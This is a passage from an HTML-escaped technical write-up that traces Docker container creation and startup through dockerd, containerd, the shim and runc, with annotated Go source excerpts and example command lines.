}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Internally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;newContainer()&lt;/code&gt; is called to create a container instance and set its root directory to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/var/lib/docker/containers/&amp;lt;id&amp;gt;&lt;/code&gt; [3].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/container.go
func (daemon *Daemon) newContainer(name string, platform ocispec.Platform, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) {
    // [...]
    base := container.NewBaseContainer(id, filepath.Join(daemon.repository, id)) // [3]
    // [...]
    base.Config = config
    base.HostConfig = hostConfig
    // [...]
    return base
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;After the container has been set up, its metadata is saved into &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;config.v2.json&lt;/code&gt; for later use [4]. The host configuration is also saved, but it is kept separately in another file, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hostconfig.json&lt;/code&gt; [5].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/container/container.go
func (container *Container) CheckpointTo(ctx context.Context, store *ViewDB) error {
    // [...]
    deepCopy, err := container.toDisk()
    // [...]
}

func (container *Container) toDisk() (*Container, error) {
    // [...]
    pth, err := container.ConfigPath() // config.v2.json
    f, err := atomicwriter.New(pth, 0o600)
    w := io.MultiWriter(&amp;amp;buf, f)
    if err := json.NewEncoder(w).Encode(container); err != nil { // [4]
        // [...]
    }

    var deepCopy Container
    if err := json.NewDecoder(&amp;amp;buf).Decode(&amp;amp;deepCopy); err != nil {
        // [...]
    }
    deepCopy.HostConfig, err = container.WriteHostConfig() // &amp;lt;--------
    // [...]
}

func (container *Container) WriteHostConfig() (*containertypes.HostConfig, error) {
    // [...]
    pth, err := container.HostConfigPath() // hostconfig.json
    f, err := atomicwriter.New(pth, 0o600)
    w := io.MultiWriter(&amp;amp;buf, f)
    if err := json.NewEncoder(w).Encode(&amp;amp;container.HostConfig); err != nil { // [5]
        // [...]
    }
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;We can see these files in the corresponding directory.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;root@aaa:~# ls -al /var/lib/docker/containers/2fa14c3b70546123aa4de5628bad07282085500fb48dee65adae4546b55b7128/
total 20
drwx--x--- 3 root root 4096 Jun  3 11:15 .
drwx--x--- 4 root root 4096 Jun  3 11:36 ..
drwx------ 2 root root 4096 Jun  3 11:15 checkpoints
-rw------- 1 root root 2462 Jun  3 11:15 config.v2.json
-rw------- 1 root root 1216 Jun  3 11:15 hostconfig.json&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;These configs are loaded and used from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt;’s memory store [6], which is a mapping from container’s ID to the container object.&lt;/p&gt;&lt;p&gt;Every time &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt; restarts, the initialization function &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;NewDaemon()&lt;/code&gt; calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;loadContainers()&lt;/code&gt; [7] to cache all of them into the memory store to avoid heavy disk access.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/daemon.go
func NewDaemon(ctx context.Context, config *config.Config, pluginStore *plugin.Store, authzMiddleware *authorization.Middleware) (_ *Daemon, retErr error) {
    // [...]
    containers, err := d.loadContainers(ctx) // [7]
    // [...]
}

func (daemon *Daemon) loadContainers(ctx context.Context) (map[string]map[string]*container.Container, error) {
    // [...]
    dir, err := os.ReadDir(daemon.repository)
    // [...]
    for _, v := range dir {
        // [...]
        id := v.Name()
        c, err := daemon.load(id)
        containers[c.ID] = c // &amp;lt;--------
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;1.2. Start&lt;/h3&gt;&lt;p&gt;After the container is created, the container-starting request is sent to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt; to run the container.&lt;/p&gt;&lt;p&gt;Inside &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ContainerStart()&lt;/code&gt;, the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;daemonCfg&lt;/code&gt; is created to hold the current daemon (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt;) configuration [1]. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;daemon.GetContainer()&lt;/code&gt; is then called to retrieve the matching container object from the memory store [2]. Finally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerStart()&lt;/code&gt; is called to start the container with these configurations [3].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/server/router/container/container_routes.go
func (c *containerRouter) postContainersStart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
    // [...]
    if err := c.backend.ContainerStart(ctx, vars[&amp;quot;name&amp;quot;], r.Form.Get(&amp;quot;checkpoint&amp;quot;), r.Form.Get(&amp;quot;checkpoint-dir&amp;quot;)); err != nil { // &amp;lt;--------
        return err
    }
    // [...]
}

// daemon/start.go
func (daemon *Daemon) ContainerStart(ctx context.Context, name string, checkpoint string, checkpointDir string) error {
    daemonCfg := daemon.config() // [1]
    // [...]
    ctr, err := daemon.GetContainer(name) // [2]
    // [...]
    return daemon.containerStart(ctx, daemonCfg, ctr, checkpoint, checkpointDir, true) // [3]
}

// daemon/daemon.go
type configStore struct {
    config.Config

    Runtimes runtimes
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerStart()&lt;/code&gt; does four things. First, it &lt;strong&gt;generates the container’s OCI spec&lt;/strong&gt; [4], which determines the container’s runtime environment. Then it &lt;strong&gt;creates a container on the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt; side&lt;/strong&gt; [5].&lt;/p&gt;&lt;p&gt;You may wonder why we still need to create another container even though we’ve already created it. Actually, these two creations are in different layers. The first is triggered by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;docker create ...&lt;/code&gt;, and it keeps metadata and config object in filesystem; it is &lt;strong&gt;for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt;&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;This time, the creation is for &lt;strong&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;-level&lt;/strong&gt; container object. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt; inserts a record about the OCI spec and shim/runtime into the database.&lt;/p&gt;&lt;p&gt;After that, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt; asks &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt; to &lt;strong&gt;create a task&lt;/strong&gt; [6]. A task is the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;-level handle for the running container; creating it starts the shim daemon, which in turn creates the init process. At this point the task is created but stopped, waiting to be unblocked before it executes the entrypoint binary.&lt;/p&gt;&lt;p&gt;Later, it then calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tsk.Start()&lt;/code&gt; [7] to &lt;strong&gt;start the task&lt;/strong&gt;, indirectly telling the shim daemon to unblock the init process, which finally executes the entrypoint binary and becomes the container.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/start.go
func (daemon *Daemon) containerStart(ctx context.Context, daemonCfg *configStore, container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (retErr error) {
    // ... container setting
    // 1. build OCI spec
    spec, err := daemon.createSpec(ctx, daemonCfg, container, mnts) // [4]
    
    // [...]
    // 2. create a container (containerd.services.containers.v1.Containers/Create)
    ctr, err := libcontainerd.ReplaceContainer(ctx, daemon.containerd, container.ID, spec, shim, createOptions, func(ctx context.Context, client *containerd.Client, c *containers.Container) error { // [5]
        // [...]
        is, ok := daemon.imageService.(*mobyc8dstore.ImageService)
        img, err := is.ResolveImage(ctx, container.Config.Image)
        // [...]
        c.Image = img.Name
        return nil
    })

    // [...]
    // 3. create a task (containerd.services.tasks.v1.Tasks/Create)
    tsk, err := ctr.NewTask(/* ... */) // [6]

    // [...]
    // 4. start the task (containerd.services.tasks.v1.Tasks/Start)
    if err := tsk.Start(context.WithoutCancel(ctx)); err != nil { // [7]
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h4&gt;1.2.1. Create the OCI spec&lt;/h4&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;createSpec()&lt;/code&gt; generates the OCI spec. It first gets the default spec [1] and registers config-parsing callbacks [2]. Later, the callbacks are invoked to modify the OCI spec [3].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/oci_linux.go
func (daemon *Daemon) createSpec(ctx context.Context, daemonCfg *configStore, c *container.Container, mounts []container.Mount) (retSpec *specs.Spec, _ error) {
    var (
        opts []coci.SpecOpts
        s    = oci.DefaultSpec() // [1]
    )
    opts = append(opts,
        withCommonOptions(daemon, &amp;amp;daemonCfg.Config, c), // [2]
        // [...]
    )
    // set options callback
    return &amp;amp;s, coci.ApplyOpts(ctx, daemon.containerdClient, &amp;amp;containers.Container{ // &amp;lt;--------
        ID:          c.ID,
        Snapshotter: snapshotter,
        SnapshotKey: snapshotKey,
    }, &amp;amp;s, opts...)
}

func ApplyOpts(ctx context.Context, client Client, c *containers.Container, s *Spec, opts ...SpecOpts) error {
    for _, o := range opts {
        if err := o(ctx, client, c, s); err != nil { // [3]
            return err
        }
    }

    return nil
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Most fields described by the default spec [4] are the same as the finally generated JSON config if you don’t pass additional options.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/pkg/oci/defaults.go
func DefaultSpec() specs.Spec {
    // [...]
    return DefaultLinuxSpec()
}

func DefaultLinuxSpec() specs.Spec {
    return specs.Spec{ // [4]
        // [...]
        Process: &amp;amp;specs.Process{
            Capabilities: &amp;amp;specs.LinuxCapabilities{
                Bounding:  caps.DefaultCapabilities(),
                Permitted: caps.DefaultCapabilities(),
                Effective: caps.DefaultCapabilities(),
            },
        },
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h4&gt;1.2.2. Save Container Metadata into DB&lt;/h4&gt;&lt;p&gt;The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.ReplaceContainer()&lt;/code&gt; call is internally wrapped into a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;/containerd.services.containers.v1.Containers/Create&amp;quot;&lt;/code&gt; request and sent to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt; [1].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/internal/libcontainerd/replace.go
func ReplaceContainer(ctx context.Context, client types.Client, id string, spec *specs.Spec, shim string, runtimeOptions any, opts ...containerd.NewContainerOpts) (types.Container, error) {
    newContainer := func() (types.Container, error) {
        return client.NewContainer(ctx, id, spec, shim, runtimeOptions, opts...)
    }
    ctr, err := newContainer() // &amp;lt;--------
    // [...]
}

// vendor/github.com/containerd/containerd/api/services/containers/v1/containers_grpc.pb.go
func (c *containersClient) Create(ctx context.Context, in *CreateContainerRequest, opts ...grpc.CallOption) (*CreateContainerResponse, error) {
    out := new(CreateContainerResponse)
    err := c.cc.Invoke(ctx, &amp;quot;/containerd.services.containers.v1.Containers/Create&amp;quot;, in, out, opts...) // [1]
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;On the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt; side, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;_Containers_Create_Handler()&lt;/code&gt; is called to save the container object into the boltdb (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/var/lib/containerd/io.containerd.metadata.v1.bolt/meta.db&lt;/code&gt;) [2].&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://github.com/etcd-io/bbolt&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bbolt&lt;/code&gt;&lt;/a&gt; is an embedded key/value database for Go, and here it is used as a metadata store by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// api/services/containers/v1/containers_grpc.pb.go
func _Containers_Create_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) {
    // [...]
    info := &amp;amp;grpc.UnaryServerInfo{
        Server:     srv,
        FullMethod: &amp;quot;/containerd.services.containers.v1.Containers/Create&amp;quot;,
    }
    handler := func(ctx context.Context, req interface{}) (interface{}, error) {
        return srv.(ContainersServer).Create(ctx, req.(*CreateContainerRequest)) // &amp;lt;--------
    }
    // [...]
}

// plugins/services/containers/local.go
func (l *local) Create(ctx context.Context, req *api.CreateContainerRequest, _ ...grpc.CallOption) (*api.CreateContainerResponse, error) {
    // [...]
    if err := l.withStoreUpdate(ctx, func(ctx context.Context) error { // [2]
        container := containerFromProto(req.Container)
        // [...]
        created, err := l.Store.Create(ctx, container)
        resp.Container = containerToProto(&amp;amp;created)
        // [...]
        return nil
    })
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The container object here is different from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt;’s. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;’s container object is a &lt;strong&gt;runtime metadata record&lt;/strong&gt; (ID, Runtime, Snapshotter, Image, Spec, Labels, …). They are persisted independently in different stores.&lt;/p&gt;&lt;p&gt;If you are interested in how the DB entry looks, you can first install the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bbolt&lt;/code&gt; CLI:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;go install go.etcd.io/bbolt/cmd/bbolt@latest&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;It allows you to view the entry content from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;meta.db&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;# [Check database file integrity]
bbolt check meta.db
## Response: OK

# [List the bucket]
bbolt buckets meta.db
## Response: v1

# [List and get keys]
bbolt keys meta.db v1
## Response:
##  moby
##  moby_history
##  version
##
## PS. moby and moby_history are sub-buckets

bbolt keys meta.db v1 moby containers
## Response:
##  db58127f96bd2c5655eb53f516ba7efeafac3c7335c5f2389e2b8a329e034b11

bbolt keys meta.db v1 moby containers db58127f96bd2c5655eb53f516ba7efeafac3c7335c5f2389e2b8a329e034b11 spec
## Response:
##  0a3674797065732e636f6e7461...(lots hex value)
## decoded: .. &amp;quot;ociVersion&amp;quot;:&amp;quot;1.3.0&amp;quot;,&amp;quot;process&amp;quot;:{&amp;quot;terminal&amp;quot;:true,&amp;quot;consoleSize&amp;quot;:{&amp;quot;height&amp;quot;:50,&amp;quot;width&amp;quot;:212}, ...&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h4&gt;1.2.3. Create Bundle &amp;amp; Spawn shim Daemon&lt;/h4&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ctr.NewTask()&lt;/code&gt; ends up as a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;/containerd.services.tasks.v1.Tasks/Create&amp;quot;&lt;/code&gt; request to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The handler &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Create()&lt;/code&gt; first gets the container object from the boltdb &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;meta.db&lt;/code&gt; [1] and sets up the create options [2]. Finally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rtime.Create()&lt;/code&gt; is called with these options [3].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// plugins/services/tasks/local.go
func (l *local) Create(ctx context.Context, r *api.CreateTaskRequest, _ ...grpc.CallOption) (*api.CreateTaskResponse, error) {
    container, err := l.getContainer(ctx, r.ContainerID) // [1]
    // [...]
    opts := runtime.CreateOpts{ // [2]
        Spec: container.Spec,
        IO: runtime.IO{
            Stdin:    r.Stdin,
            Stdout:   r.Stdout,
            Stderr:   r.Stderr,
            Terminal: r.Terminal,
        },
        // [...]
        Runtime:         container.Runtime.Name,
        // [...]
    }
    // [...]
    rtime := l.v2Runtime
    c, err := rtime.Create(ctx, r.ContainerID, opts) // [3]
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Inside &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Create()&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;NewBundle()&lt;/code&gt; is called to create the runtime container directories and files [4]. Later, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;m.manager.Start()&lt;/code&gt; [5] spawns a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd-shim-runc-v2&lt;/code&gt; process as the container shim daemon. Finally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;shimTask.Create()&lt;/code&gt; sends a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CreateTaskRequest&lt;/code&gt; to the shim daemon, which in turn executes the command &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;run create --bundle &amp;lt;bundle_dir&amp;gt;&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// core/runtime/v2/task_manager.go
func (m *TaskManager) Create(ctx context.Context, taskID string, opts runtime.CreateOpts) (_ runtime.Task, retErr error) {
    // [...]
    bundle, err := NewBundle(ctx, m.root, m.state, taskID, opts.Spec) // [4]
    shim, err := m.manager.Start(ctx, taskID, bundle, opts) // [5]
    shimTask, err := newShimTask(shim)
    // [...]
    t, err := func() (runtime.Task, error) {
        t, err := shimTask.Create(ctx, opts) // [6]
        // [...]
    }()
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The OCI config file is created in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;NewBundle()&lt;/code&gt; with the path &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;/run/containerd/io.containerd.runtime.v2.task/&amp;lt;namespace&amp;gt;/&amp;lt;id&amp;gt;/config.json&amp;quot;&lt;/code&gt; [7].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// core/runtime/v2/bundle.go
func NewBundle(ctx context.Context, root, state, id string, spec typeurl.Any) (b *Bundle, err error) {
    // [...]
    ns, err := namespaces.NamespaceRequired(ctx) // ns == &amp;quot;moby&amp;quot;
    b = &amp;amp;Bundle{
        ID:        id,
        Path:      filepath.Join(state, ns, id), // state == &amp;quot;/run/containerd/io.containerd.runtime.v2.task/&amp;quot;
                                                 // id == &amp;quot;&amp;lt;container id&amp;gt;&amp;quot;
        // [...]
    }
    // [...]
    if spec != nil {
        if spec := spec.GetValue(); spec != nil {
            // [...]
            specPath := filepath.Join(b.Path, oci.ConfigFilename)
            err = os.WriteFile(specPath, spec, 0666) // [7]
        }
    }
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The actual command for spawning a shim process looks like:&lt;/p&gt;&lt;p&gt;The arguments of the command executed by the shim daemon to create a container consist of the global part (before &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;create&lt;/code&gt;) and the sub-command part (after &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;create&lt;/code&gt;).&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;/usr/bin/runc \
--root /var/run/docker/runtime-runc/moby \
--log /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/log.json \
--log-format json \
--systemd-cgroup \
create \
--bundle /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5 \
--pid-file /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/init.pid \
636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h4&gt;1.2.4. Enter the Container&lt;/h4&gt;&lt;p&gt;In the final step, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tsk.Start()&lt;/code&gt; is called to send a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;/containerd.services.tasks.v1.Tasks/Start&amp;quot;&lt;/code&gt; request to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;, whose handler is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Start()&lt;/code&gt; in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;local.go&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;This function first looks up the running task [1] and then sends a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;StartRequest&lt;/code&gt; to the shim daemon to start the container [2].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// plugins/services/tasks/local.go
func (l *local) Start(ctx context.Context, r *api.StartRequest, _ ...grpc.CallOption) (*api.StartResponse, error) {
    t, err := l.getTask(ctx, r.ContainerID) // [1]
    // [...]
    p := runtime.Process(t)
    // [...]
    if err := p.Start(ctx); err != nil { // &amp;lt;--------
        // [...]
    }
    // [...]
}

// core/runtime/v2/shim.go
func (s *shimTask) Start(ctx context.Context) error {
    _, err := s.task.Start(ctx, &amp;amp;task.StartRequest{ // [2]
        ID: s.ID(),
    })
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;On the shim daemon side, the command &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc start &amp;lt;id&amp;gt;&lt;/code&gt; is executed to unblock the init process that &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc create&lt;/code&gt; left parked just before &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;execve()&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The actual command line looks like:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;/usr/bin/runc \
--root /var/run/docker/runtime-runc/moby \
--log /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/log.json \
--log-format json \
--systemd-cgroup \
start \
636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h2&gt;2. Runc Internal&lt;/h2&gt;&lt;p&gt;Here, we try to understand how &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc&lt;/code&gt; loads the container by reviewing the source code.&lt;/p&gt;&lt;h3&gt;2.1. Cmd: create&lt;/h3&gt;&lt;p&gt;The command “create” handler is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;startContainer()&lt;/code&gt;. It indirectly calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;start()&lt;/code&gt;, which in turn calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;createExecFifo()&lt;/code&gt; [1] to create a FIFO file and builds the init command by calling &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;newParentProcess()&lt;/code&gt; [2]. Finally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;parent.start()&lt;/code&gt; is called to execute &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; [3].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// create.go
var createCommand = &amp;amp;cli.Command{
    Name:  &amp;quot;create&amp;quot;,
    Action: func(_ context.Context, cmd *cli.Command) error {
        // [...]
        status, err := startContainer(cmd, CT_ACT_CREATE, nil) // &amp;lt;--------
        // [...]
    },
}

// libcontainer/container_linux.go
func (c *Container) start(process *Process) (retErr error) {
    if process.Init {
        // [...]
        if err := c.createExecFifo(); err != nil { // [1]
            return err
        }
        // [...]
    }

    // [...]
    parent, err := c.newParentProcess(process) // [2]

    if err := parent.start(); err != nil { // [3]
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;newParentProcess()&lt;/code&gt; prepares the command line for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/proc/self/fd/&amp;lt;runc_fd&amp;gt; init&lt;/code&gt;. The command and process information are wrapped into an &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;initProcess&lt;/code&gt; object and returned [4].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/container_linux.go
func (c *Container) newParentProcess(p *Process) (parentProcess, error) {
    else {
        // [...]
        safeExe, err = exeseal.CloneSelfExe(c.stateDir)
        // [...]
        exePath = &amp;quot;/proc/self/fd/&amp;quot; + strconv.Itoa(int(safeExe.Fd()))
        // [...]
    }
    cmd := exec.Command(exePath, &amp;quot;init&amp;quot;)
    cmd.Args[0] = os.Args[0]
    // [...]
    if p.Init {
        // [...]
        return c.newInitProcess(p, cmd, comm) // [4]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;parent.start()&lt;/code&gt; is then called to fork a child process and execve &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; [5].&lt;/p&gt;&lt;p&gt;Now there are two processes. The child (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt;) is the one that &lt;strong&gt;enters the new namespaces&lt;/strong&gt; and &lt;strong&gt;sets up the container environment&lt;/strong&gt; from the inside, such as mounting the filesystem and applying seccomp rules. It is the same process that will &lt;strong&gt;later execve the user’s command&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;The parent stays on the host as a privileged helper, doing the things the child &lt;strong&gt;can’t do&lt;/strong&gt; once it’s inside the namespaces: applying cgroups, providing the uid/gid maps, and running host-side hooks.&lt;/p&gt;&lt;p&gt;The two coordinate over a sync socket &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;p.comm.syncSockParent&lt;/code&gt; [6]. Once the child is ready, the parent will receive the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;procReady&lt;/code&gt; event [7] and exit.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/process_linux.go
func (p *initProcess) start() (retErr error) {
    // [...]
    err := p.cmd.Start() // [5]

    // [...]
    if err := p.manager.Apply(p.pid()) // set up cgroups

    if err := p.createNetworkInterfaces(); err != nil {
        // [...]
    }

    if err := p.setupNetworkDevices(); err != nil {
        // [...]
    }

    if p.config.Config.HasHook(configs.CreateContainer, configs.StartContainer) {
        // [...]
    }

    ierr := parseSync(p.comm.syncSockParent /* [6] */, func(sync *syncT) error {
        case procMountPlease:
            // [...]
        case procSeccomp:
            // [...]
        case procReady: // [7]
            // [...]
        case procHooks:
            // [...]
        // [...]
    })
    // [...]
    return nil
